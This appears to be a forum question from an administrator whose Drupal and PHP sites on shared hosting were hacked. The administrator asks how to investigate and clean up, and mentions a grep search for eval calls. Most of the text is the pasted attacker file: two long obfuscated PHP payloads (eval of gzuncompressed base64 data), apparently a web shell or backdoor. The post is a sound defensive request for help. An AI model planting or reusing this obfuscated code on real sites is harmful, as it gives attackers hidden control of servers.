# Multiple sites hacked, same MO but no cure

Tags: php

We've been having some troubles with cracked sites lately.

We've found several files on our sites (who are on a shared hosting platform) that don't belong there. These files are usually .txt or image files (it was a .js file once) that then get included in existing php files, effectively running them on the server.

The php code is something like this:

```
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU...
```

Well it really just goes on from there.

From what I understand so far, the above code opens some kind of shell.

We also have sites that are infected who have links to various porn/advertising sites added to the bottom of the page. Although I don't think it's the same code (as the snippet above) that adds these links to the page. I have yet to find the source of these alterations.

Most of these attacks occur on Drupal sites, some of them are upgraded to the latest version of everything (modules + core) and still show signs of attacks.
The attacks aren't limited to Drupal sites however, there are normal php sites that where cracked as well.

I know the first step would be to check the server logs, I've requested them but I do not have them yet.

I was wondering if anyone could give me some pointers as to what I should look for or what the next "obvious" steps to take are. (I've already changed the db and ftp passwords).

I have used the following snippet to track down some of the files:

```
grep -nRH --exclude=*.js 'eval(' *
```

I also ran that piece of code without excluding javascript files and I've deleted all of the attacker's files I could find.

I'd be happy to provide any additional information that could help solve this issue.

**EDIT:** the source code of the files:

```
    <?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU+LOBdoChsaV1AKPJgP6wMYZvCLqpbsQgsyYmbyK4QX+Wv7/BQF3dDjjcvI0XkcMhD8gydD/7XP6aTr3/+PXg4PAy+3U1eX5f1x2y5W/36+aFY5f8Wq4+DwU+/DNI4qDM3eMw34ck8h8uIvo63g08/f6edbkkSHhKXnosqc8b08pjG6yp3F5e3O0hsJPSoMz88yBrplmxCq8podcZkE3/ntIq2041HslMafb7TfJ2OitnvknRzvyN55t6X0l7jD5/b+ANEOE58R/y0SH7R942n+UXSbUBriTOiuehfuePc3FerzV9KBMZ72HkrXdL3eFIjRt87wNaJ1jvBVpMlaJsqcHR7xha9NfYkW4mpJpImcUmPx3wWXuhlObnD8dIOEgS12fHInoR7Id5o/CKfRvuQFXPScqLFeH1K7tO7dxLtkahGZkjTWVfpdq557qxrGc0MFRIIHstxLKPRyWD7Alznkv/FLKiyuYZhPgvKdOTVaTzdcVXRItU2IwVtRIodkVZH9t41VUrSHWo6BKaws/LLi9x3JC6AfrlHrLSI8XYdEI3oYVhppPjYsAexkelQUlpXXEcSayRuyBHR+sWrsk05tGh98S6dn7C9ODKCak0g82FjH5hceLfZOZN6nZkmxFlpDLw1zd4rel6uvULEM8CpetbHxDjxWbxT20Wfk967o67Z2qelQddUQvgsarb4P0PbN7b12r55f5g+3GeOiBiYm6RARuM+7gdUZBIvnnWuYoSNNj3+twMbNPu0GH7NmT2Fqsz5RgF2he/tgI5blPmTZDPv+3ff+GuNjN5uaV/xQhsVPRTtgnlyl1J+KYPAdyF0Z+MFPWCbmVX1gj04A4cIPg9lPqT7KmaWLZnPz+vEkW5KsklynG5OpvcmX1qW3WndTEHDVMzAEnchcD3I9yDnPPznOv+xc38s6D0aC5wDTedcpvFEiRd21BpCTTrowSFiNF3FXBuMk2jxotSSvS6v7hVURaTeKcjFlJYa0wLj13mj4IhqwFxhmSk4HyYXpPKEpIk5IcmPzChtbn4sLy079B0BD3ix9jtXiMRaOaSipPXJNXWNfFNd04tU2/Q9A9Lz0VtpFklfESlPQ3zDmh7mKVfr36LRNrPLcyZqdXwQIeOaFk4OwBpGg/6SbdlPskn5fHNTBVUCXM7K/NznSP1V4pyPyZM6tap3jvFhZ6r1Vbaq7wPSXIWW/blrZitfmpDflSVmbTXrJgbCkOQGR9AxZioZS3h+hTziRCS2DLzx5obP9OiqS60dxgD5YxwsVXZbC31KMh+8qlSKpZvRueEwcbzj0iklP3xcTnvL/EPfmxlIZ2pzAklG2VatrbY+mJWAJHCnRb2/DYfArowNMxQtnuCTzD8NYogns+Pazw3t7xQpR+1M1vyiQVa730Hyjm4iqO2adrZhVIOO9YCmqNlwtIok0Ldk97tqfbenehY5G9354mza9YCSJ0j1XNPS1i/saFHK9dJMKLL+bUSV/0rpPnf/CYGvtLwflfb8rO81eQoAKrjrfbAs/unV3Pe0qJMvV3A/IdyYfG394xh+IjXiKDwlniIBbie/vOKqT7/9BzrVvS4='))); ?><?php eval(gzuncompress(base64_decode('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